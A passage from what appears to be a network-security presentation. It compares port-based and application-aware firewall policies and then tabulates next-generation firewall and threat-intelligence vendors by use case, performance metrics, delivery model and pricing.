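    return "ALLOW", f"{app} to {host}"
```

The two policies disagree exactly where it matters: SSH on port 443 passes the port-based rule and is denied by the application-aware one, while HTTP on 8080 is denied by port and allowed (and inspected) by application. The SNI read is the cheap, pre-decryption classification step; the DECRYPT_AND_INSPECT verdict is where an NGFW's SSL decryption would take over for hosts that are neither blocked outright nor exempt.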
Top NGFW Vendors - 1
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| Sophos | SMB and mid-market primarily, as well as IaaS on Azure | Throughput of 11,800 Mbps, 30 million concurrent connections and 300,000 new connections per second | Analytics into root cause of malware attacks, machine learning for better detection rates | Hardware, software and virtual appliance | Pricing starts at $249/year for entry-level appliance; depends on performance and features |
| Check Point | Strong in retail, financial services, government, healthcare, service providers, utilities, manufacturing | Firewall throughput from 90 Mbps in small office devices to 128 Gbps in high-end chassis-based systems | Inspects at the CPU level to stop attacks, and OS-level threat emulation | On premises, virtual, in public clouds | Prices range from $499 up to a few hundred thousand dollars |
| Barracuda | Strong in central and southern EMEA and North America, especially in mid to large enterprises with globally dispersed WANs or needing secure cloud connectivity | 40 Gbps firewall throughput, 10 Gbps VPN throughput and up to 15,000 users | Machine learning and intelligence features to identify potential malware | On-premises and virtual versions | From $699 plus support |
| Juniper Networks | Small- to mid-size enterprise markets as well as service providers, telecom, financial services and healthcare | 2 Tbps firewall, six nines of reliability, more than 100 Gbps IPS, and 100 million concurrent user sessions | Juniper Sky Advanced Threat Prevention cloud-based service, which leverages reporting and analytics tools, and machine learning algorithms | Appliances, software, private and public clouds | Low-end appliances start around $300 |
| Fortinet | Data centers, distributed mid-to-large enterprises, communications service providers, government, defense, finance, education and retail | Firewall throughput of up to 630 Gbps, IPS of up to 120 Gbps, NGFW throughput of up to 100 Gbps, and a threat intelligence network of 3.3 million sensors | Machine learning-based threat intelligence and deep analytics | Hardware appliance, virtual machine, cloud and SaaS | Entry-level hardware appliances start at around $500 |
Top NGFW Vendors - 2
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| Forcepoint | Distributed enterprises and government agencies | Can manage 2,000 firewalls and IPS devices with the ability to update hundreds in minutes | Analysis of the behavior of anomalous network connections | Physical appliance, virtual and cloud deployments | Starting at under $1,000 |
| SonicWall | SMBs, midmarket and large enterprise | Gateway throughput of up to 9 Gbps, TLS/SSL inspection throughput of up to 3 Gbps and up to 10 million connections | More than a million SonicWall sensors provide data that is analyzed via machine learning using deep learning algorithms | On premises appliances | From around $500 for a small business or branch office up to around $80,000 |
| Palo Alto Networks | All industries | 200 Gbps of firewall throughput, 100 Gbps of threat prevention throughput, 1.2 million connections per second and up to 80 million sessions | Automated event aggregation and filtering | Physical and virtual appliances | No pricing data available |
| Cisco | SMBs to large enterprise | 1.2 Tbps clustered throughput, 57 million concurrent connections, 500,000 new connections per second | IP, URL, and DNS threat intelligence | Physical and virtual firewalls | Starting at under $1,000 |
| Huawei | Asia/Pacific region or EMEA, especially in enterprises | 10 Gbps attack and defense performance | Traffic analysis | Physical appliances, and a virtual firewall compatible with Microsoft Azure | Starting price less than $2,000 |
Threat Intelligence - 1
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| IBM | Retailers, financial services, enterprise | Unlimited queries per month, and up to 5,000 records per month | Machine learning and IBM Watson analytics | Via web browser or through an API that integrates with existing security solutions | The API is free for 5,000 records/month; the commercial API starts at $2,000 per user/month |
| Anomali | Financial services, enterprise | Can process millions of Indicators of Compromise (IOCs) | Machine learning and integration with other security platforms | SaaS, on-premises, or hybrid | Pricing varies based on customer environment |
| Palo Alto Networks | Large enterprises | Receives hundreds of millions of samples per month, and over a trillion artifacts across petabytes of data | Statistical analytics, correlation and machine learning | SaaS-based security services | Licensed as a per-user annual subscription or enterprise-wide |
| RSA | Financial institutions, governments and oil/gas/energy/telcos | Can ingest 30,000 EPS per system and up to 100k endpoints per system | Automated segmentation and enforcement | On premises, in private clouds, on virtual machines, or public cloud | Tiered throughput or subscription licensing |
Threat Intelligence - 2
| VENDOR | USE CASES | METRICS | INTELLIGENCE | DELIVERY | PRICING |
|---|---|---|---|---|---|
| LogRhythm | Financial services, retail, manufacturing, and government | 26 billion messages per day and over 10K gigabytes per day | Pattern matching and advanced correlation to machine learning and statistical analysis | Software and hardware | Pricing begins at $27,000 |
| FireEye | Financial services, government and IT | More than 1,000 experts responding to incidents and researching attacks | Automation enables it to go from alert to fix in seconds | Via API integration, intelligence portal, and email delivery | Subscriptions range from $100,000 to $500,000 |
| LookingGlass Cyber Solutions | Enterprise and third-party risk monitoring | Over 140 sources of threat data gathered | Machine-readable threat intelligence | Hosted or on-premises | Open-source business model |
| AlienVault | Companies with smaller IT security teams | Receives 10 million indicators of compromise every day | Automation and machine learning | Cloud, virtual or hardware appliance | Monthly subscription; tiers start at $1,575/month for a 250 GB data volume |
Thank You!
Questions?